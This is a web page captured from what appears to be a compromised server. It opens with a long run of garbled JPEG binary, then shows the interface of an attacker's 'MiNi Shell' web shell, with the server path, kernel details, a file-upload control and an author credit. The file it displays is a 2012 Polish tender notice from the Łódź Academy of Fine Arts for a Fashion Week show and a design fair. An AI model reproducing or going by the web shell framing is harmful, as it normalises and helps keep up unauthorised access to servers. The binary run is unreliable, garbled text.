JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120309/74248-N-2012.html

<p class="kh_header"><b>Łódź: Organizacja pokazu mody  Moda inspirowana Nowym Jorkiem i Hong Kongiem oraz organizacja Giełdy projektów
w ramach projektu:
Centrum Promocji Mody - klaster branży 
tekstylno-odzieżowej - Rozwój.</b><br>
<b>Numer ogłoszenia: 74248 - 2012; data zamieszczenia: 09.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Władysława Strzemińskiego w Łodzi , ul. Wojska Polskiego 121, 91-726 Łódź, woj. łódzkie, tel. 042 2547408, centrala 2547598, faks 042 2547418.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja pokazu mody  Moda inspirowana Nowym Jorkiem i Hong Kongiem oraz organizacja Giełdy projektów
w ramach projektu:
Centrum Promocji Mody - klaster branży 
tekstylno-odzieżowej - Rozwój..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składają się dwie części:
Część 1 - usługa polegająca na kompleksowej organizacji pokazu mody Moda inspirowana Nowym Jorkiem i Hong Kongiem (8-10 kolekcji na około 3-4 sylwetki każda) w ramach projektu pt. CENTRUM PROMOCJI MODY - KLASTER BRANŻY TEKSTYLNO - ODZIEŻOWEJ - ROZWÓJ ORAZ
Część 2 - usługa organizacji Giełdy projektów w ramach projektu pt. CENTRUM PROMOCJI MODY - KLASTER BRANŻY TEKSTYLNO - ODZIEŻOWEJ - ROZWÓJ.

Termin realizacji odnośnie do zadania A i B: jeden dzień  podczas  wiosennej  edycji Fashion Week   (18-22 kwietnia  2012r). 


Do obowiązków Wykonawcy należy:

I.	W ramach części 1 - kompleksowa organizacja pokazu mody Moda inspirowana Nowym Jorkiem i Hong Kongiem w ramach projektu: Centrum Promocji Mody - klaster branży tekstylno-odzieżowej - Rozwój.

1.	Zapewnienie miejsca na realizację pokazu w Hotelu Andels w Łodzi (91-065), przy ul. Ogrodowej 17, z udziałem ok. 500 osób widowni o powierzchni min 800 m.kw.
2.	Zapewnienie 15 prezenterów (modeli),  do akceptacji Zamawiającego.
3.	Zapewnienie profesjonalnej obsługi  garderoby w ilości minimum 6 osób w tym osoby kierującej zapleczem z doświadczeniem w podobnych imprezach (w zakresie ich obowiązków będzie- organizacja przymiarek, zabezpeczenie garderoby, odpowiedzialność za kolekcje, przygotowanie kolekcji do pokazu).
4.	Zapewnienie obsługi fryzjerskiej w postaci min. 3 (trzech) osób z doświadczeniem w podobnych imprezach.
5.	Zapewnienie  3 (trzech)  profesjonalnych  makijażystów z doświadczeniem w podobnych imprezach.
6.	Zapewnienie profesjonalnej  infrastruktury technicznej niezbędnej do realizacji pokazu w tym:
-zapewnienie profesjonalnej ekipy oświetleniowej oraz sprzętu oświetleniowego  i przyłączy elektrycznych, 
-	zapewnienie obsługi  nagłośnienia i  sprzętu dźwiękowego, 
-	zapewnienie dźwiękowca do wykonania montaży dźwiękowych, 
-	zapewnienie reżysera pokazu , 
-	projekt scenografii oraz jej wykonanie,
-	budowa podestu, konstrukcji kratowych.
7.	Zatrudnienie Agencji PR celem zaproszenia min. 8 dziennikarzy mediów ogólnopolskich zajmujących się tematyką modową oraz prasy zagranicznej zajmującej się tematyką modową.
8.	Obsługa Sali-serwis Sali (4 osoby)
9.	Obsługa recepcji pokazu
10.	Druk zaproszeń i ich dystrybucja
11.	Projektor multimedialny i wykonanie grafik z nazwiskami projektantów.
12.	Zapewnienie obsługi serwisu foto podczas pokazu.
13.	Zapewnienie osoby prowadzącej imprezę -gospodarza wydarzenia spośród tzw. osoby medialnej osób o rozpoznawalnym wizerunku.

II. W ramach części 2 - organizacja Giełdy projektów w ramach projektu: Centrum Promocji Mody - klaster branży tekstylno-odzieżowej - Rozwój.

1. Wynajęcie powierzchni ekspozycyjnej o powierzchni 30 m. kwadratowych podczas wydarzenia modowego Fashion Week w terminie 19-22 kwietnia 2012r  na terenie Łódzkiej Specjalnej Strefy Ekonomicznej przy ul. Tymienieckiego 22/24 z udziałem min. 1.000 osób dziennie uczestniczących w wydarzeniach Fashion Week.
2. Umożliwienie zaprezentowania na tej powierzchni kolekcji i port folio dla 8 - 12 studentów ASP.
3. zapewnienie identyfikatorów oraz kart wjazdu na teren strefy dla 8-12 studentów ASP - uczestników Giełdy.
4. Wyposażenie powierzchni ekspozycyjnej w 10 stolików i 10 krzeseł, podłączenie do prądu oraz oświetlenie górne.
5. Zapewnienie aranżacji powierzchni ekspozycyjnej w postaci wybudowania jednej tylnej ściany wystawienniczej o szerokości 6 m z identyfikacją wizualną zgodną z dostarczonym przez zamawiającego projektem.
6. Dbanie o czystość wynajętej powierzchni  podczas trwania Giełdy Projektów.
7. Przekazanie zdjęć dokumentujących przebieg giełdy projektów dla zamawiającego.



Zaoferowana przez Wykonawcę cena za realizację całego przedmiotu zamówienia jest ceną ryczałtową.
W cenie oferty Wykonawca uwzględnia wszelkie koszty związane z realizacją przedmiotu zamówienia opisanego w pkt 2 w tym w zakresie części 1 - koszty związane z wynajmem Sali w Hotelu Andels w Łodzi (91-065), ul. Ogrodowa 1, w pomieszczeniu o powierzchni min 800 m.kw. z udziałem ok. 500 osób widowni oraz w zakresie części 2 - koszty związane z wynajmem powierzchni ekspozycyjnej o powierzchni 30 m.kw. na terenie Łódzkiej Specjalnej Strefy Ekonomicznej w Łodzi przy ul. Tymienieckiego 22-24 z udziałem min. 1.000 osób dziennie uczestniczących w wydarzeniach Fashion Week..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.50.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 18.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W zakresie części 1:
wykonawca wykaże się wykonaniem a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem w okresie ostatnich trzech lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej trzech usług polegających na zorganizowaniu pokazów mody, w tym co najmniej jednego pokazu mody dla widowni min. 600 osób. Wykonawca wraz z wykazem powinien podać przedmiot usługi, wartość, datę wykonania, odbiorców oraz załączyć dokument potwierdzający, że usługi zostały należycie wykonane - według załącznika nr 3 do SIWZ.
2.	W zakresie części 2:
wykonawca wykaże się wykonaniem a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem w okresie ostatnich trzech lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwóch usług polegających na zorganizowaniu giełd projektów, w którym uczestniczyło min. 30 wystawców odrębnie na każdą giełdę projektu. Wykonawca wraz z wykazem powinien podać przedmiot usługi, datę wykonania, oraz załączyć dokument potwierdzający, że usługi zostały należycie wykonane - według załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać:
1) Wypełniony Formularz Oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 4 do SIWZ, 
2) Dokumenty i oświadczenia Wykonawcy potwierdzające spełnienie warunków udziału w postępowaniu - zgodnie z pkt 12 i 13 SIWZ,
3) Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
4) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
5) W przypadku, gdy Wykonawca przewiduje wykonanie zamówienia z udziałem podwykonawców należy załączyć wypełniony - Załącznik Nr 6 do SIWZ.
6) Pozostałe dokumenty wymienione w pkt 12, 13  SIWZ.
Zalecane przez Zamawiającego jest złożenie w ofercie spisu treści z wyszczególnieniem ilości stron wchodzących w skład oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian w zawartej umowie
  w sprawie zamówienia publicznego, w toku jej realizacji:
1.	Wszelkie zmiany umowy, o ile konieczność ich wprowadzenia będzie wynikała ze zmian w obowiązujących przepisach prawa.
2.	Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy wskutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu. 
3.	Rezygnacja z realizacji zadania składającego się na przedmiot zamówienia i zmiana umowy w tym zakresie (obniżenie wynagrodzenia za konkretne zadanie opisane w pkt 2 SIWZ).
4.	Zmiana terminu realizacji zadań składających się na przedmiot umowy.
5.	Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez zamawiającego umowy o dofinansowanie projektu systemowego lub wytycznych dotyczących realizacji zamówienia.
6.	Wydłużenie terminu płatności za realizację zadania do czasu otrzymania środków z Instytucji Zarządzającej. Maksymalny termin przedłużenia terminu płatności to 3 miesiące licząc od daty, otrzymania faktury/rachunku od Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.asp.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.asp.lodz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2012 godzina 10:00, miejsce: 1Oferty należy złożyć w siedzibie Zamawiającego, Łódź, ul. Wojska Polskiego 121, parter, pok. 41..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie to jest realizowane ze środków Unii Europejskiej. Projekt pod tytułem Centrum Promocji Mody - Klaster branży tekstylno - odzieżowej - Rozwój, realizowany w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007 - 2013. Płatność za wykonanie przedmiotu zamówienia zrealizowana będzie na podstawie faktury VAT, na rachunek bankowy Wykonawcy w terminie do 30 dni po dostarczeniu do Zamawiającego prawidłowo wystawionej faktury VAT, po zrealizowaniu całego przedmiotu zamówienia. Termin płatności może ulec wydłużeniu do czasu otrzymania środków z Instytucji Zarządzającej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> kompleksowa organizacja pokazu mody Moda inspirowana Nowym Jorkiem i Hong Kongiem w ramach projektu: Centrum Promocji Mody - klaster branży tekstylno-odzieżowej - Rozwój..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polegająca na kompleksowej organizacji pokazu mody Moda inspirowana Nowym Jorkiem i Hong Kongiem (8-10 kolekcji na około 3-4 sylwetki każda) w ramach projektu pt. CENTRUM PROMOCJI MODY - KLASTER BRANŻY TEKSTYLNO - ODZIEŻOWEJ - ROZWÓJ
Do obowiązków Wykonawcy należy:

I.	W ramach części 1 - kompleksowa organizacja pokazu mody Moda inspirowana Nowym Jorkiem i Hong Kongiem w ramach projektu: Centrum Promocji Mody - klaster branży tekstylno-odzieżowej - Rozwój.

1.	Zapewnienie miejsca na realizację pokazu w Hotelu Andels w Łodzi (91-065), przy ul. Ogrodowej 17, z udziałem ok. 500 osób widowni o powierzchni min 800 m.kw.
2.	Zapewnienie 15 prezenterów (modeli),  do akceptacji Zamawiającego.
3.	Zapewnienie profesjonalnej obsługi  garderoby w ilości minimum 6 osób w tym osoby kierującej zapleczem z doświadczeniem w podobnych imprezach (w zakresie ich obowiązków będzie- organizacja przymiarek, zabezpieczenie garderoby, odpowiedzialność za kolekcje, przygotowanie kolekcji do pokazu).
4.	Zapewnienie obsługi fryzjerskiej w postaci min. 3 (trzech) osób z doświadczeniem w podobnych imprezach.
5.	Zapewnienie  3 (trzech)  profesjonalnych  makijażystów z doświadczeniem w podobnych imprezach.
6.	Zapewnienie profesjonalnej  infrastruktury technicznej niezbędnej do realizacji pokazu w tym:
-zapewnienie profesjonalnej ekipy oświetleniowej oraz sprzętu oświetleniowego  i przyłączy elektrycznych, 
-	zapewnienie obsługi  nagłośnienia i  sprzętu dźwiękowego, 
-	zapewnienie dźwiękowca do wykonania montaży dźwiękowych, 
-	zapewnienie reżysera pokazu , 
-	projekt scenografii oraz jej wykonanie,
-	budowa podestu, konstrukcji kratowych.
7.	Zatrudnienie Agencji PR celem zaproszenia min. 8 dziennikarzy mediów ogólnopolskich zajmujących się tematyką modową oraz prasy zagranicznej zajmującej się tematyką modową.
8.	Obsługa Sali-serwis Sali (4 osoby)
9.	Obsługa recepcji pokazu
10.	Druk zaproszeń i ich dystrybucja
11.	Projektor multimedialny i wykonanie grafik z nazwiskami projektantów.
12.	Zapewnienie obsługi serwisu foto podczas pokazu.
13.	Zapewnienie osoby prowadzącej imprezę -gospodarza wydarzenia spośród tzw. osoby medialnej osób o rozpoznawalnym wizerunku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.50.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> organizacja Giełdy projektów w ramach projektu: Centrum Promocji Mody - klaster branży tekstylno-odzieżowej - Rozwój..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> usługa organizacji Giełdy projektów w ramach projektu pt. CENTRUM PROMOCJI MODY - KLASTER BRANŻY TEKSTYLNO - ODZIEŻOWEJ - ROZWÓJ.
Do obowiązków Wykonawcy należy:
1. Wynajęcie powierzchni ekspozycyjnej o powierzchni 30 m. kwadratowych podczas wydarzenia modowego Fashion Week w terminie 19-22 kwietnia 2012r  na terenie Łódzkiej Specjalnej Strefy Ekonomicznej przy ul. Tymienieckiego 22/24 z udziałem min. 1.000 osób dziennie uczestniczących w wydarzeniach Fashion Week.
2. Umożliwienie zaprezentowania na tej powierzchni kolekcji i port folio dla 8 - 12 studentów ASP.
3. zapewnienie identyfikatorów oraz kart wjazdu na teren strefy dla 8-12 studentów ASP - uczestników Giełdy.
4. Wyposażenie powierzchni ekspozycyjnej w 10 stolików i 10 krzeseł, podłączenie do prądu oraz oświetlenie górne.
5. Zapewnienie aranżacji powierzchni ekspozycyjnej w postaci wybudowania jednej tylnej ściany wystawienniczej o szerokości 6 m z identyfikacją wizualną zgodną z dostarczonym przez zamawiającego projektem.
6. Dbanie o czystość wynajętej powierzchni  podczas trwania Giełdy Projektów.
7. Przekazanie zdjęć dokumentujących przebieg giełdy projektów dla zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.50.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com